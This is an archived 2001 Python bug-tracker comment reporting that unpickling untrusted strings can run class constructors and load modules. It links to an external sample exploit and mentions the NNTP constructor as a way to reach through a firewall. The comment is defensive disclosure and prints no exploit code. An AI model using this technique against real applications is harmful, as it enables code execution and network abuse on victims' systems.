This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

Author phr
Recipients
Date 2001-10-16.23:06:42
SpamBayes Score
Marked as misclassified
Message-id
In-reply-to
Content
Logged In: YES 
user_id=72053

Certainly anyone unserializing potentially malicious data
with pickle, marshal, or anything else, should check the
results before doing anything dangerous with them (like
executing code).  However, unpickle can potentially do
damage before it even returns, by creating loading modules
and creating initialized class instances.  So pickle.loads
should never be used on untrusted strings, except possibly
in a rexec wrapper (as proposed by Tim).  Another
possibility (also by Tim) is to override the load_inst
method of the Pickler class, though I don't think you can
do that for cPickle.

A sample exploit for unpickle can be found at
<http://www.nightsong.com/phr/python/pickletest.py>.
Unpickling the test string runs penguin.__init__ contrary
to the doc's saying no initialization unless there's a
__getinitargs__ method in the class def.

The "exploding penguin" class is artificial, but
applications are vulnerable if there's an unsafe
constructor anywhere in any class of the application or in
the python library (example: the NNTP constructor opens an
IP connection to an arbitrary address, so a malicious
imported string can send a message through your firewall
when you import it).
History
Date User Action Args
2007-08-23 13:56:49adminlinkissue471893 messages
2007-08-23 13:56:49admincreate